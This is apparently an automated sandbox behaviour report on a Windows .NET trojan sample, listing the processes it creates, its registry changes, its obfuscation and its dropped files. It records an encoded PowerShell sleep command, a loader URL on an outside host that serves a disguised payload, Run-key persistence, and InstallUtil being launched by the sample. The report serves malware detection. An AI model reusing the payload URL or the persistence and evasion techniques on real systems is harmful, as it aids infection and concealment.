Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe "C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe "C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File created: C:\Users\user\AppData\Roaming\Nuedxyv Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyav4ani.mau.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/8@3/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe String found in binary or memory: Cqeugqnbvdcq#http://google.comyhttps://inspire-ts.com/loader/uploads/programme_Lpznednj.png
Source: 28.0.InstallUtil.exe.400000.0.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 28.0.InstallUtil.exe.400000.0.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static file information: File size 1337856 > 1048576
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Yjgcdbfyd.exe.0.dr, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Yjgcdbfyd.exe.0.dr, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.90000.0.unpack, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.90000.0.unpack, u0001/u0002.cs .Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Code function: 0_2_00930490 push 00000000h; ret 0_2_009304A0
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B676EF pushfd ; iretd 27_2_06B67704
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B676CF pushfd ; iretd 27_2_06B676DF
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6A635 pushfd ; iretd 27_2_06B6A637
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B67648 pushfd ; iretd 27_2_06B67658
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6A7B3 pushfd ; iretd 27_2_06B6A7B5
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6771D push E803CF9Bh; retf 27_2_06B67731
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6877A pushfd ; iretd 27_2_06B6878D
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B664C9 push es; retf 27_2_06B664F4
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6A47D pushfd ; iretd 27_2_06B6A493
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B663FF pushfd ; iretd 27_2_06B66401
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B610B8 pushfd ; iretd 27_2_06B610B9
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6509B pushfd ; iretd 27_2_06B650AB
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65026 pushfd ; iretd 27_2_06B65036
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6101C pushfd ; iretd 27_2_06B6101D
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65067 pushfd ; iretd 27_2_06B65069
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65057 push 9B68158Bh; iretd 27_2_06B6505C
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B64FD1 pushfd ; iretd 27_2_06B64FD3
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65F3E pushfd ; iretd 27_2_06B65F40
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B64F10 pushfd ; iretd 27_2_06B64F16
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B66F7F pushfd ; iretd 27_2_06B67783
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B66F7F pushfd ; iretd 27_2_06B677A4
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65F7B push eax; iretd 27_2_06B65F7C
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B68CF2 pushfd ; iretd 27_2_06B68D03
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B68C31 pushfd ; iretd 27_2_06B68C42
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B68C5E pushfd ; iretd 27_2_06B68C6F
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B64DD5 pushfd ; iretd 27_2_06B64DD7
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B65D0A pushfd ; iretd 27_2_06B65D0C
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B68A0B pushfd ; iretd 27_2_06B68A1C
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B68A70 pushfd ; iretd 27_2_06B68A72
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Code function: 27_2_06B6AB03 pushfd ; iretd 27_2_06B6AB05
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe File created: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Yjgcdbfyd Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Yjgcdbfyd Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download5.png
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
